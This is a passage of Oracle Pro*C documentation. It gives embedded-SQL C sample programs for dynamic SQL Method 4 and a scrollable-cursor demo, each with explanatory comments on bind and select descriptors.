numbers[1] = 1015; depts[1] = 30; strcpy(&names[2] [0], "FRAZIER"); numbers[2] = 1016; depts[2] = 30; strcpy(&names[3] [0], "CARUSO"); numbers[3] = 1017; ind_dept[3] = -1; /* set indicator to -1 to insert NULL */ depts[3] = 30; /* value in depts[3] is ignored */ strcpy(&names[4] [0], "WESTON"); numbers[4] = 1018; depts[4] = 30; /* Do the INSERT. */ printf("Adding to the Sales force...\n"); EXEC SQL FOR :array_size EXECUTE stmt USING DESCRIPTOR binda; /* Print rows-processed count. */ printf("%d rows inserted.\n\n", sqlca.sqlerrd[2]); EXEC SQL COMMIT RELEASE; exit(0); sql_error: /* Print Oracle error message. */ printf("\n%.70s", sqlca.sqlerrm.sqlerrmc); EXEC SQL WHENEVER SQLERROR CONTINUE; EXEC SQL ROLLBACK RELEASE; exit(1); } This program shows the basic steps required to use dynamic SQL with Method 4. After connecting to Oracle, the program: Allocates memory for the descriptors using SQLSQLDAAlloc() Prompts the user for a SQL statement PREPAREs the statement DECLAREs a cursor Checks for any bind variables using DESCRIBE BIND OPENs the cursor DESCRIBEs any select-list items. If the input SQL statement is a query, the program FETCHes each row of data, then CLOSEs the cursor. This program is available on-line in the demo directory, in the file sample10.pc. /******************************************************************* Sample Program 10: Dynamic SQL Method 4 This program connects you to ORACLE using your username and password, then prompts you for a SQL statement. You can enter any legal SQL statement. Use regular SQL syntax, not embedded SQL. Your statement will be processed. If it is a query, the rows fetched are displayed. You can enter multiline statements. The limit is 1023 characters. This sample program only processes up to MAX_ITEMS bind variables and MAX_ITEMS select-list items. MAX_ITEMS is #defined to be 40. *******************************************************************/ #include <stdio.h> #include <string.h> #include <setjmp.h> #include <sqlda.h> #include <stdlib.h> #include <sqlcpr.h> /* Maximum number of select-list items or bind variables. */ #define MAX_ITEMS 40 /* Maximum lengths of the _names_ of the select-list items or indicator variables. */ #define MAX_VNAME_LEN 30 #define MAX_INAME_LEN 30 #ifndef NULL #define NULL 0 #endif /* Prototypes */ #if defined(__STDC__) void sql_error(void); int oracle_connect(void); int alloc_descriptors(int, int, int); int get_dyn_statement(void); void set_bind_variables(void); void process_select_list(void); void help(void); #else void sql_error(/*_ void _*/); int oracle_connect(/*_ void _*/); int alloc_descriptors(/*_ int, int, int _*/); int get_dyn_statement(/* void _*/); void set_bind_variables(/*_ void -*/); void process_select_list(/*_ void _*/); void help(/*_ void _*/); #endif char *dml_commands[] = {"SELECT", "select", "INSERT", "insert", "UPDATE", "update", "DELETE", "delete"}; EXEC SQL INCLUDE sqlda; EXEC SQL INCLUDE sqlca; EXEC SQL BEGIN DECLARE SECTION; char dyn_statement[1024]; EXEC SQL VAR dyn_statement IS STRING(1024); EXEC SQL END DECLARE SECTION; SQLDA *bind_dp; SQLDA *select_dp; /* Define a buffer to hold longjmp state info. */ jmp_buf jmp_continue; /* A global flag for the error routine. */ int parse_flag = 0; void main() { int i; /* Connect to the database. */ if (oracle_connect() != 0) exit(1); /* Allocate memory for the select and bind descriptors. */ if (alloc_descriptors(MAX_ITEMS, MAX_VNAME_LEN, MAX_INAME_LEN) != 0) exit(1); /* Process SQL statements. */ for (;;) { (void) setjmp(jmp_continue); /* Get the statement. Break on "exit". */ if (get_dyn_statement() != 0) break; /* Prepare the statement and declare a cursor. */ EXEC SQL WHENEVER SQLERROR DO sql_error(); parse_flag = 1; /* Set a flag for sql_error(). */ EXEC SQL PREPARE S FROM :dyn_statement; parse_flag = 0; /* Unset the flag. */ EXEC SQL DECLARE C CURSOR FOR S; /* Set the bind variables for any placeholders in the SQL statement. */ set_bind_variables(); /* Open the cursor and execute the statement. * If the statement is not a query (SELECT), the * statement processing is completed after the * OPEN. */ EXEC SQL OPEN C USING DESCRIPTOR bind_dp; /* Call the function that processes the select-list. * If the statement is not a query, this function * just returns, doing nothing. */ process_select_list(); /* Tell user how many rows processed. */ for (i = 0; i < 8; i++) { if (strncmp(dyn_statement, dml_commands[i], 6) == 0) { printf("\n\n%d row%c processed.\n", sqlca.sqlerrd[2], sqlca.sqlerrd[2] == 1 ? '\0' : 's'); break; } } } /* end of for(;;) statement-processing loop */ /* When done, free the memory allocated for pointers in the bind and select descriptors. */ for (i = 0; i < MAX_ITEMS; i++) { if (bind_dp->V[i] != (char *) 0) free(bind_dp->V[i]); free(bind_dp->I[i]); /* MAX_ITEMS were allocated. */ if (select_dp->V[i] != (char *) 0) free(select_dp->V[i]); free(select_dp->I[i]); /* MAX_ITEMS were allocated. */ } /* Free space used by the descriptors themselves. */ SQLSQLDAFree( SQL_SINGLE_RCTX, bind_dp); SQLSQLDAFree( SQL_SINGLE_RCTX, select_dp); EXEC SQL WHENEVER SQLERROR CONTINUE; /* Close the cursor. */ EXEC SQL CLOSE C; EXEC SQL COMMIT WORK RELEASE; puts("\nHave a good day!\n"); EXEC SQL WHENEVER SQLERROR DO sql_error(); return; } int oracle_connect() { EXEC SQL BEGIN DECLARE SECTION; VARCHAR username[128]; VARCHAR password[32]; EXEC SQL END DECLARE SECTION; printf("\nusername: "); fgets((char *) username.arr, sizeof username.arr, stdin); username.arr[strlen((char *) username.arr)-1] = '\0'; username.len = (unsigned short)strlen((char *) username.arr); printf("password: "); fgets((char *) password.arr, sizeof password.arr, stdin); password.arr[strlen((char *) password.arr) - 1] = '\0'; password.len = (unsigned short)strlen((char *) password.arr); EXEC SQL WHENEVER SQLERROR GOTO connect_error; EXEC SQL CONNECT :username IDENTIFIED BY :password; printf("\nConnected to ORACLE as user %s.\n", username.arr); return 0; connect_error: fprintf(stderr, "Cannot connect to ORACLE as user %s\n", username.arr); return -1; } /* * Allocate the BIND and SELECT descriptors using SQLSQLDAAlloc(). * Also allocate the pointers to indicator variables * in each descriptor. The pointers to the actual bind * variables and the select-list items are realloc'ed in * the set_bind_variables() or process_select_list() * routines. This routine allocates 1 byte for select_dp->V[i] * and bind_dp->V[i], so the realloc will work correctly. */ alloc_descriptors(size, max_vname_len, max_iname_len) int size; int max_vname_len; int max_iname_len; { int i; /* * The first SQLSQLDAAlloc parameter is the runtime context. * The second parameter determines the maximum number of * array elements in each variable in the descriptor. In * other words, it determines the maximum number of bind * variables or select-list items in the SQL statement. * * The third parameter determines the maximum length of * strings used to hold the names of select-list items * or placeholders. The maximum length of column * names in ORACLE is 30, but you can allocate more or less * as needed. * * The fourth parameter determines the maximum length of * strings used to hold the names of any indicator * variables. To follow ORACLE standards, the maximum * length of these should be 30. But, you can allocate * more or less as needed. */ if ((bind_dp = SQLSQLDAAlloc(SQL_SINGLE_RCTX, size, max_vname_len, max_iname_len)) == (SQLDA *) 0) { fprintf(stderr, "Cannot allocate memory for bind descriptor."); return -1; /* Have to exit in this case. */ } if ((select_dp = SQLSQLDAAlloc (SQL_SINGLE_RCTX, size, max_vname_len, max_iname_len)) == (SQLDA *) 0) { fprintf(stderr, "Cannot allocate memory for select descriptor."); return -1; } select_dp->N = MAX_ITEMS; /* Allocate the pointers to the indicator variables, and the actual data. */ for (i = 0; i < MAX_ITEMS; i++) { bind_dp->I[i] = (short *) malloc(sizeof (short)); select_dp->I[i] = (short *) malloc(sizeof(short)); bind_dp->V[i] = (char *) malloc(1); select_dp->V[i] = (char *) malloc(1); } return 0; } int get_dyn_statement() { char *cp, linebuf[256]; int iter, plsql; for (plsql = 0, iter = 1; ;) { if (iter == 1) { printf("\nSQL> "); dyn_statement[0] = '\0'; } fgets(linebuf, sizeof linebuf, stdin); cp = strrchr(linebuf, '\n'); if (cp && cp != linebuf) *cp = ' '; else if (cp == linebuf) continue; if ((strncmp(linebuf, "EXIT", 4) == 0) || (strncmp(linebuf, "exit", 4) == 0)) { return -1; } else if (linebuf[0] == '?' || (strncmp(linebuf, "HELP", 4) == 0) || (strncmp(linebuf, "help", 4) == 0)) { help(); iter = 1; continue; } if (strstr(linebuf, "BEGIN") || (strstr(linebuf, "begin"))) { plsql = 1; } strcat(dyn_statement, linebuf); if ((plsql && (cp = strrchr(dyn_statement, '/'))) || (!plsql && (cp = strrchr(dyn_statement, ';')))) { *cp = '\0'; break; } else { iter++; printf("%3d ", iter); } } return 0; } void set_bind_variables() { int i, n; char bind_var[64]; /* Describe any bind variables (input host variables) */ EXEC SQL WHENEVER SQLERROR DO sql_error(); bind_dp->N = MAX_ITEMS; /* Initialize count of array elements. */ EXEC SQL DESCRIBE BIND VARIABLES FOR S INTO bind_dp; /* If F is negative, there were more bind variables than originally allocated by SQLSQLDAAlloc(). */ if (bind_dp->F < 0) { printf ("\nToo many bind variables (%d), maximum is %d\n.", -bind_dp->F, MAX_ITEMS); return; } /* Set the maximum number of array elements in the descriptor to the number found. */ bind_dp->N = bind_dp->F; /* Get the value of each bind variable as a * character string. * * C[i] contains the length of the bind variable * name used in the SQL statement. * S[i] contains the actual name of the bind variable * used in the SQL statement. * * L[i] will contain the length of the data value * entered. * * V[i] will contain the address of the data value * entered. * * T[i] is always set to 1 because in this sample program * data values for all bind variables are entered * as character strings. * ORACLE converts to the table value from CHAR. * * I[i] will point to the indicator value, which is * set to -1 when the bind variable value is "null". */ for (i = 0; i < bind_dp->F; i++) { printf ("\nEnter value for bind variable %.*s: ", (int)bind_dp->C[i], bind_dp->S[i]); fgets(bind_var, sizeof bind_var, stdin); /* Get length and remove the new line character. */ n = strlen(bind_var) - 1; /* Set it in the descriptor. */ bind_dp->L[i] = n; /* (re-)allocate the buffer for the value. SQLSQLDAAlloc() reserves a pointer location for V[i] but does not allocate the full space for the pointer. */ bind_dp->V[i] = (char *) realloc(bind_dp->V[i], (bind_dp->L[i] + 1)); /* And copy it in. */ strncpy(bind_dp->V[i], bind_var, n); /* Set the indicator variable's value. */ if ((strncmp(bind_dp->V[i], "NULL", 4) == 0) || (strncmp(bind_dp->V[i], "null", 4) == 0)) *bind_dp->I[i] = -1; else *bind_dp->I[i] = 0; /* Set the bind datatype to 1 for CHAR. */ bind_dp->T[i] = 1; } return; } void process_select_list() { int i, null_ok, precision, scale; if ((strncmp(dyn_statement, "SELECT", 6) != 0) && (strncmp(dyn_statement, "select", 6) != 0)) { select_dp->F = 0; return; } /* If the SQL statement is a SELECT, describe the select-list items. The DESCRIBE function returns their names, datatypes, lengths (including precision and scale), and NULL/NOT NULL statuses. */ select_dp->N = MAX_ITEMS; EXEC SQL DESCRIBE SELECT LIST FOR S INTO select_dp; /* If F is negative, there were more select-list items than originally allocated by SQLSQLDAAlloc(). */ if (select_dp->F < 0) { printf ("\nToo many select-list items (%d), maximum is %d\n", -(select_dp->F), MAX_ITEMS); return; } /* Set the maximum number of array elements in the descriptor to the number found. */ select_dp->N = select_dp->F; /* Allocate storage for each select-list item. SQLNumberPrecV6() is used to extract precision and scale from the length (select_dp->L[i]). sqlcolumnNullCheck() is used to reset the high-order bit of the datatype and to check whether the column is NOT NULL. CHAR datatypes have length, but zero precision and scale. The length is defined at CREATE time. NUMBER datatypes have precision and scale only if defined at CREATE time. If the column definition was just NUMBER, the precision and scale are zero, and you must allocate the required maximum length. DATE datatypes return a length of 7 if the default format is used. This should be increased to 9 to store the actual date character string. If you use the TO_CHAR function, the maximum length could be 75, but will probably be less (you can see the effects of this in SQL*Plus). ROWID datatype always returns a fixed length of 18 if coerced to CHAR. LONG and LONG RAW datatypes return a length of 0 (zero), so you need to set a maximum. In this example, it is 240 characters. */ printf ("\n"); for (i = 0; i < select_dp->F; i++) { char title[MAX_VNAME_LEN]; /* Turn off high-order bit of datatype (in this example, it does not matter if the column is NOT NULL). */ SQLColumnNullCheck ((unsigned short *)&(select_dp->T[i]), (unsigned short *)&(select_dp->T[i]), &null_ok); switch (select_dp->T[i]) { case 1 : /* CHAR datatype: no change in length needed, except possibly for TO_CHAR conversions (not handled here). */ break; case 2 : /* NUMBER datatype: use SQLNumberPrecV6() to extract precision and scale. */ SQLNumberPrecV6( SQL_SINGLE_RCTX, (unsigned long *)&(select_dp->L[i]), &precision, &scale); /* Allow for maximum size of NUMBER. */ if (precision == 0) precision = 40; /* Also allow for decimal point and possible sign. */ /* convert NUMBER datatype to FLOAT if scale > 0, INT otherwise. */ if (scale > 0) select_dp->L[i] = sizeof(float); else select_dp->L[i] = sizeof(int); break; case 8 : /* LONG datatype */ select_dp->L[i] = 240; break; case 11 : /* ROWID datatype */ select_dp->L[i] = 18; break; case 12 : /* DATE datatype */ select_dp->L[i] = 9; break; case 23 : /* RAW datatype */ break; case 24 : /* LONG RAW datatype */ select_dp->L[i] = 240; break; } /* Allocate space for the select-list data values. SQLSQLDAAlloc() reserves a pointer location for V[i] but does not allocate the full space for the pointer. */ if (select_dp->T[i] != 2) select_dp->V[i] = (char *) realloc(select_dp->V[i], select_dp->L[i] + 1); else select_dp->V[i] = (char *) realloc(select_dp->V[i], select_dp->L[i]); /* Print column headings, right-justifying number column headings. */ /* Copy to temporary buffer in case name is null-terminated */ memset(title, ' ', MAX_VNAME_LEN); strncpy(title, select_dp->S[i], select_dp->C[i]); if (select_dp->T[i] == 2) if (scale > 0) printf ("%.*s ", select_dp->L[i]+3, title); else printf ("%.*s ", select_dp->L[i], title); else printf("%-.*s ", select_dp->L[i], title); /* Coerce ALL datatypes except for LONG RAW and NUMBER to character. */ if (select_dp->T[i] != 24 && select_dp->T[i] != 2) select_dp->T[i] = 1; /* Coerce the datatypes of NUMBERs to float or int depending on the scale. */ if (select_dp->T[i] == 2) if (scale > 0) select_dp->T[i] = 4; /* float */ else select_dp->T[i] = 3; /* int */ } printf ("\n\n"); /* FETCH each row selected and print the column values. */ EXEC SQL WHENEVER NOT FOUND GOTO end_select_loop; for (;;) { EXEC SQL FETCH C USING DESCRIPTOR select_dp; /* Since each variable returned has been coerced to a character string, int, or float very little processing is required here. This routine just prints out the values on the terminal. */ for (i = 0; i < select_dp->F; i++) { if (*select_dp->I[i] < 0) if (select_dp->T[i] == 4) printf ("%-*c ",(int)select_dp->L[i]+3, ' '); else printf ("%-*c ",(int)select_dp->L[i], ' '); else if (select_dp->T[i] == 3) /* int datatype */ printf ("%*d ", (int)select_dp->L[i], *(int *)select_dp->V[i]); else if (select_dp->T[i] == 4) /* float datatype */ printf ("%*.2f ", (int)select_dp->L[i], *(float *)select_dp->V[i]); else /* character string */ printf ("%-*.*s ", (int)select_dp->L[i], (int)select_dp->L[i], select_dp->V[i]); } printf ("\n"); } end_select_loop: return; } void help() { puts("\n\nEnter a SQL statement or a PL/SQL block at the SQL> prompt."); puts("Statements can be continued over several lines, except"); puts("within string literals."); puts("Terminate a SQL statement with a semicolon."); puts("Terminate a PL/SQL block (which can contain embedded semicolons)"); puts("with a slash (/)."); puts("Typing \"exit\" (no semicolon needed) exits the program."); puts("You typed \"?\" or \"help\" to get this message.\n\n"); } void sql_error() { /* ORACLE error handler */ printf ("\n\n%.70s\n",sqlca.sqlerrm.sqlerrmc); if (parse_flag) printf ("Parse error at character offset %d in SQL statement.\n", sqlca.sqlerrd[4]); EXEC SQL WHENEVER SQLERROR CONTINUE; EXEC SQL ROLLBACK WORK; longjmp(jmp_continue, 1); } The following demo program describes the scrollable cursor feature applied with oracle dynamic method 4. This program is available on-line in the file scrolldemo1.pc in your demo directory. /* * This demo program exhibits the scrollable cursor feature * used with oracle dynamic method 4. The scrollable cursor * feature can also be used with ANSI dynamic method 4. * * This program takes as argument the username/passwd. Once * logged in, it prompts for a select query.It then prompts * for the orientation and prints the results of the query. * * Before executing this example, make sure that the hr/hr * schema exists. */ #include <stdio.h> #include <sqlca.h> #include <sqlda.h> #include <sqlcpr.h> #include <stdlib.h> #include <setjmp.h> #define MAX_SELECT_ITEMS 200 #define MAX_CHARS 500 /* Maximum size of a select-list item name */ #define MAX_NAME_SIZE 50 SQLDA *selda; SQLDA *bind_des; jmp_buf beginEnv; jmp_buf loopEnv; /* Data buffer */ char c_data[MAX_SELECT_ITEMS][MAX_CHARS]; char username[60]; char stmt[500]; /* Print the generic error message & exit */ void sql_error() { char msgbuf[512]; size_t msgbuf_len, msg_len; msgbuf_len = sizeof(msgbuf); sqlglm(msgbuf, &msgbuf_len, &msg_len); printf ("\n\n%.*s\n", msg_len, msgbuf); EXEC SQL WHENEVER SQLERROR CONTINUE; EXEC SQL ROLLBACK WORK RELEASE; exit(EXIT_FAILURE); } /* Print the error message and continue to query the user */ void sql_loop_error() { char msgbuf[512]; size_t msgbuf_len, msg_len; int code = sqlca.sqlcode; msgbuf_len = sizeof(msgbuf); sqlglm(msgbuf, &msgbuf_len, &msg_len); printf ("\n%.*s\n", msg_len, msgbuf); printf("The error code is %d\n", sqlca.sqlcode); if (code==-900 || code == -942 || code == -904) longjmp(beginEnv, 1); longjmp(loopEnv, 1); } /* FETCH has returned the "no data found" error code. This means that either we have reached the end of the active set or the offset refers to a row beyond the active set */ void no_data_found() { printf("\nNo Data available at the specified offset\n"); longjmp(loopEnv, 1); } void main(int argc, char *argv[]) { int i, n; int sli; /* select-list item */ int offset; int contFlag; char bindVar[20]; char *u, temp[3]; char choice; /* Error Handler */ EXEC SQL WHENEVER SQLERROR DO sql_error(); if (argc == 1) { printf("Logging in as default user hr\n"); strcpy(username, "hr/hr"); } else strcpy(username, argv[1]); /* Establish a connection to the data base */ EXEC SQL CONNECT :username; u = username; while(*++u != '/'); *u = '\0'; /* Error Handler */ EXEC SQL WHENEVER SQLERROR DO sql_loop_error(); for (;;) { setjmp(beginEnv); printf("[%s] SQL > ", username); gets(stmt); if (!strlen(stmt)) continue; if (!strcmp(tolower(stmt), "exit")) break; selda = sqlald(MAX_SELECT_ITEMS, MAX_NAME_SIZE, 0); bind_des = sqlald(MAX_SELECT_ITEMS, MAX_NAME_SIZE, 30); /* prepare an sql statement for the query*/ EXEC SQL PREPARE S FROM :stmt; /* Declare a cursor as scrollable */ EXEC SQL DECLARE C SCROLL CURSOR FOR S; for (i=0; i<MAX_SELECT_ITEMS; i++) { bind_des->I[i] = (short *) malloc(sizeof (short)); bind_des->V[i] = (char *) malloc(1); } bind_des->N = MAX_SELECT_ITEMS; EXEC SQL DESCRIBE BIND VARIABLES FOR S INTO bind_des; /* set up the bind variables */ if (bind_des->F < 0) { printf("Bind descriptor, value exceeds the limit\n"); exit(-1); } bind_des->N = bind_des->F; for (i=0; i<bind_des->F; i++) { printf("Enter the value for bind variable %.*s: ", (int)bind_des->C[i], bind_des->S[i]); fgets(bindVar, sizeof(bindVar), stdin); n = strlen(bindVar) - 1; bind_des->L[i] = n; bind_des->V[i] = (char *) realloc(bind_des->V[i], (bind_des->L[i] +1)); strncpy(bind_des->V[i], bindVar, n); if ((strncmp(bind_des->V[i], "NULL", 4) == 0) || (strncmp(bind_des->V[i], "null", 4) == 0)) *bind_des ->I[i] = -1; else *bind_des ->I[i] = 0; bind_des->T[i] = 1; } /* open the cursor */ EXEC SQL OPEN C USING DESCRIPTOR bind_des; EXEC SQL DESCRIBE SELECT LIST FOR S INTO selda; if (selda->F < 0) { printf("Select descriptor, value exceeds the limit\n"); exit(-1); } selda->N = selda->F; for (sli = 0; sli < selda->N; sli++) { /* Set addresses of heads of the arrays in the V element. */ selda->V[sli] = c_data[sli]; /* Convert everything to varchar on output. */ selda->T[sli] = 1; /* Set the maximum lengths. */ selda->L[sli] = MAX_CHARS; } while(1) { printf("\n\nEnter the row number to be fetched \n"); printf("1.ABSOLUTE\n"); printf("2.RELATIVE\n"); printf("3.FIRST \n"); printf("4.NEXT \n"); printf("5.PREVIOUS \n"); printf("6.LAST \n"); printf("7.CURRENT \n"); printf("Enter your choice --> "); scanf("%c",&choice); EXEC SQL WHENEVER NOT FOUND DO no_data_found(); switch(choice) { case '1': printf("\nEnter Offset :"); scanf("%d",&offset); EXEC SQL FETCH ABSOLUTE :offset C USING DESCRIPTOR selda; break; case '2': printf("\nEnter Offset :"); scanf("%d",&offset); EXEC SQL FETCH RELATIVE :offset C USING DESCRIPTOR selda; break; case '3': EXEC SQL FETCH FIRST C USING DESCRIPTOR selda; break; case '4': EXEC SQL FETCH NEXT C USING DESCRIPTOR selda; break; case '5': EXEC SQL FETCH PRIOR C USING DESCRIPTOR selda; break; case '6': EXEC SQL FETCH LAST C USING DESCRIPTOR selda; break; case '7': EXEC SQL FETCH CURRENT C USING DESCRIPTOR selda; break; default : printf("Invalid choice\n"); continue; } /* print the row */ for (sli=0; sli<selda->N; sli++) printf("%.10s ", c_data[sli]); puts(""); setjmp(loopEnv); contFlag = 'x'; while(contFlag != 'Y' && contFlag != 'N') { printf("\nContinue with the current fetch? [y/n] : "); contFlag = toupper(getchar()); } if (contFlag != 'Y') break; } EXEC SQL CLOSE C; } EXEC SQL ROLLBACK RELEASE; exit(EXIT_SUCCESS); }
http://docs.oracle.com/cd/B14117_01/appdev.101/a97269/pc_15ody.htm
CC-MAIN-2016-18
refinedweb
9,746
53.51
DEBSOURCES Skip Quicknav sources / python-extclass / 1.2-1 / Acquisition Acquisition Acquisition [1] is a mechanism that allows objects to obtain attributes from their environment. It is similar to inheritence, except that, rather than traversing an inheritence hierarchy to obtain attributes, a containment hierarchy is traversed. The "ExtensionClass":ExtensionClass.html. release includes mix-in extension base classes that can be used to add acquisition as a feature to extension subclasses. These mix-in classes use the context-wrapping feature of ExtensionClasses to implement acquisition. Consider 'A' inherits acquisition behavior from 'Acquisition.Implicit'. The object, 'a', "has" the color of objects 'c' and 'd' when it is accessed through them, but it has no color by itself. The object 'a' obtains attributes from it's environment, where it's'. Aquisition wrappers provide access to the wrapped objects through the attributes 'aq_parent', 'aq_self', 'aq_base'. In the example above, the expressions:: 'c.a.aq_parent is c' and:: 'c.a.aq_self is a' both evaluate to true, but the expression:: 'c.a is a' evaluates to false, because the expression 'c.a' evaluates to an acquisition wrapper around 'c' and 'a', not 'a' itself. The attribute 'aq_base' is similar to 'aq_self'. Wrappers may be nested and 'aq_self' may be a wrapped object. The 'aq_base' attribute is the underlying object with all wrappers removed. Acquisition Control Two styles of acquisition are supported in the current ExtensionClass release, implicit and explicit aquisition. Implicit acquisition Implicit acquisition is so named because it searches for attributes from the environment automatically whenever an attribute cannot be obtained directly from an object or through inheritence. An attribute may be implicitly acquired if it's name does not begin with an underscore, '_'. To support implicit acquisition, an object should inherit from the mix-in class 'Acquisition.Implicit'. Explicit Acquisition When explicit acquisition is used, attributes are not automatically obtained from the environment. Instead, the method 'aq_aquire' must be used, as in:: print c.a.aq_acquire('color') To support explicit acquisition, an object should inherit from the mix-in class 'Acquisition.Explicit'. Controlled Acquisition A class (or instance) can provide attribute by attribute control over acquisition. This is done by: - subclassing from 'Acquisition.Explicit', and - setting all attributes that should be acquired to the special value: 'Acquisition.Acquired'. Setting an attribute to this value also allows inherited attributes to be overridden with acquired ones. For example, in:: class C(Acquisition.Explicit): id=1 secret=2 color=Acquisition.Acquired __roles__=Acquisition.Acquired The *only* attributes that are automatically acquired from containing objects are 'color', and '__roles__'. Note also that the '__roles__' attribute is acquired even though it's name begins with an underscore. In fact, the special 'Acquisition.Acquired' value can be used in 'Acquisition.Implicit' objects to implicitly acquire selected objects that smell like private objects. 'p', because the attribute doesn't satisfy the condition given in the filter. The output of the last line is:: spam(Nice) and I am nice! Acquisition and methods Python methods of objects that support acquisition can use acquired attributes as in the 'report' method of the first example above.. Acquiring Acquiring objects Consider the following example:: from Acquisition import Implicit class C(Implicit): def __init__(self, name): self.name=name def __str__(self): return "%s(%s)" % (self.name, self.__class__.__name__) __repr__=__str__ a=C("a") a.b=C("b") a.b.pref="spam" a.b.c=C("c") a.b.c.color="red" a.b.c.pref="eggs" a.x=C("x") o=a.b.c.x The expression 'o.color' might be expected to return '"red"'. In earlier versions of ExtensionClass, however, this expression failed. Acquired acquiring objects did not acquire from the environment they were accessed in, because objects were only wrapped when they were first found, and were not rewrapped as they were passed down the acquisition tree. In the current release of ExtensionClass, the expression "o.color" does indeed return '"red"'. When searching for an attribute in 'o', objects are searched in the order 'x', 'a', 'b', 'c'. So, for example, the expression, 'o.pref' returns '"spam"', not '"eggs"'. In earlier releases of ExtensionClass, the attempt to get the 'pref' attribute from 'o' would have failed. If desired, the current rules for looking up attributes in complex expressions can best be understood through repeated application of the '__of__' method: 'a.x' -- 'x.__of__(a)' 'a.b' -- 'b.__of__(a)' 'a.b.x' -- 'x.__of__(a).__of__(b.__of__(a))' 'a.b.c' -- 'c.__of__(b.__of__(a))' 'a.b.c.x' -- 'x.__of__(a).__of__(b.__of__(a)).__of__(c.__of__(b.__of__(a)))' and by keeping in mind that attribute lookup in a wrapper is done by trying to lookup the attribute in the wrapped object first and then in the parent object. In the expressions above involving the '__of__' method, lookup proceeds from left to right. Note that heuristics are used to avoid most of the repeated lookups. For example, in the expression: 'a.b.c.x.foo', the object 'a' is searched no more than once, even though it is wrapped three times. .. [1] Gil, J., Lorenz, D., "Environmental Acquisition--A New Inheritance-Like Abstraction Mechanism",, OOPSLA '96 Proceedings, ACM SIG-PLAN, October, 1996
https://sources.debian.org/src/python-extclass/1.2-1/Acquisition.stx/
CC-MAIN-2020-34
refinedweb
868
50.23
Asked by: Win2JS.ui-light.css, input buttons, viewbox confusion I recently was given some help with a memory game app I am developing. I could not get scroll to work, so Win2JS.ui-light.css was disabled. A new class win-scrollview was added to the outerdeck div. I have since managed to get all the content on the page so I re-enabled the ui-light.css, and removed the win-scrollview class from the html. I wanted to use viewbox to help responsiveness (orientation, snap) during the game itself. The choice of settings is through a separate div, and is chosen with buttons. If I have the light.css enabled and viewbox, then there is no functionality in the buttons. The buttons work with either but not both. When I click a button nothing happens. It does not feed through to the associated eventHandler (I tried setting a breakpoint at the start of the event handler but the programme did not reach it). I am wondering where I have gone wrong. The relevant html is <!-- WinJS references --> <link href="//Microsoft.WinJS.2.0/css/ui-light.css" rel="stylesheet" /> <script src="//Microsoft.WinJS.2.0/js/base.js"></script> <script src="//Microsoft.WinJS.2.0/js/ui.js"></script> <body> <div id="settings"> <div id="difficulty"> <ul> <li><input type="button" id="easymatch" class="button" name="Match" value="Easy Match Game" /></li> <li><input type="button" id="easymemory" class="button" value="Easy Memory Game" /></li> and so on ..... </ul> </div> </div> <div data- The game is played here. <div id="outerdeck"> </div> </div> The relevant javascript. } var promise = WinJS.UI.processAll(); promise.then( function () { // this code runs when the application has started. initialiseHtmlElements(); }); args.setPromise(promise); var easyMatchButton = document.getElementById("easymatch"); easyMatchButton.addEventListener("click", memory.bind({ SA: SettingsArray[0]}), false); and so on Thank you for your help.Tuesday, May 20, 2014 3:22 PM Question All replies I tested your code and had to make the following changes: 1) Commented out initialiseHtmlElements(); 2) Replaced easyMatchButton.addEventListener("click", memory.bind({ SA: SettingsArray[0]}), false); with easyMatchButton.addEventListener("click", DoSomething), false); and function DoSomething() { var MyDialog = new Windows.UI.Popups.MessageDialog("hello!"); MyDialog.showAsync(); } the button click worked fine. Am I missing something?, May 21, 2014 1:47 PMModerator Many thanks for your help. Much appreciated. The initialise was added to keep several var aname = document.getElementById("something") current during the running of the game. They were going out of scope each time a function was called even if they were declared at the top as var aname = document.getElementById("something") Perhaps a namespace might have done the trick? (Am still a bit wobbly on namespaces.) The easyMatchButton.addEventListener("click",memory.bind({SA: SettingsArray[0]}), false) feeds settings to the game The settings array gives the number of cards, number of copies, whether match or memory version and makes it easy to alter the various game levels. These settings can then be fed into the game function directly. Does that mean that to get rid of the bind({SA: SettingsArray[0]}) I would need to add a dozen functions in place of a single array? I have since altered the code to: args.setPromise(WinJS.UI.processAll().then(function completed(){ // this code runs when the application has started. initialiseHtmlElements(); var easyMatchButton = document.getElementById("easymatch"); easyMatchButton.addEventListener("click", memory.bind({ SA: SettingsArray[0]}), false); var easyMemoryButton = document.getElementById("easymemory"); easyMemoryButton.addEventListener("click", memory.bind({ SA: SettingsArray[1] }), false); etc. The html : I have the light.css enabled, but have no viewport. The buttons work. I have written an algorithm which resizes the images for the game based on the number of cards and the size of the screen. Everything fits in the screen including in the simulator screens. On the simulator the game responds well to rotation. However, on my hybrid laptop the game does not respond when rotated. (Normally the window does rotate with ease.) Am not sure why this is. Do I believe the simulator or my laptop? I am wondering if there is any alternative to viewport for orientation, or if I need to write that in myself. Interestingly when trying out other winJS alternatives for outerdeckb div I found that some did not block the buttons but some did. I do not understand why the easyMatchButton.addEventListener("click",memory.bind({SA: SettingsArray[0]}), false) should stop the buttons working with the viewport. Is there any reason why it should? That might help me work round it (and understand the workings of an app more thoroughly). Thanking you in advance for your help. Thursday, May 22, 2014 7:24 AM
https://social.msdn.microsoft.com/Forums/en-US/8c9259d8-ebfa-4786-ad9d-abb6d0e0a186/win2jsuilightcss-input-buttons-viewbox-confusion?forum=winappswithhtml5
CC-MAIN-2018-30
refinedweb
774
52.36
Programmer, Architect, Teacher Do you have any coding standards for your projects? Microsoft defines C# coding conventions, and it could be a starting point to follow. There are many reasons why it is important to apply coding standards for your project: - The same rules for writing code improve software readability by allowing developers to understand new code faster and better. - The codebase is almost never fully supported by its original author. Most of the total cost of software is spent on its maintenance. - Helps to demonstrate best practices. - Like any other product, the software must be "well packaged" and clean. StyleCop de facto is a standard tool for .NET. It analyzes C# source code to enforce a set of style and consistency rules. Default rules set could be used, or you can configure your own. The cool thing is that warnings and errors are shown in the IDE during the compilation. It was introduced in 2008 and is now available in two options: the StyleCop Visual Studio extension and StyleCop NuGet package. The NuGet package is the most convenient method to use StyleCop since it does not require any additional configuration of the IDE. That is great when working in a team. Also, if you use other IDEs than Visual Studio (e.g., JetBrains Rider on Mac), it will perfectly do the job. So let’s dive in. StyleCop Installation As described above NuGet package is the best way to use StyleCop. To add the StyleCop NuGet package to your project, you should run the following command: Install-Package StyleCop.Analyzers The NuGet package manager also could be used to find and install the StyleCop NuGet package directly in the IDE. After the installation, you can compile your project and see if there are any errors or warnings in the output bar. For the simple Hello World console application, you could see something like this: Build started 01/03/2022 23:33:44. "/ConsoleApp1/ConsoleApp1.csproj" (build target) (1) -> (CoreCompile target) -> 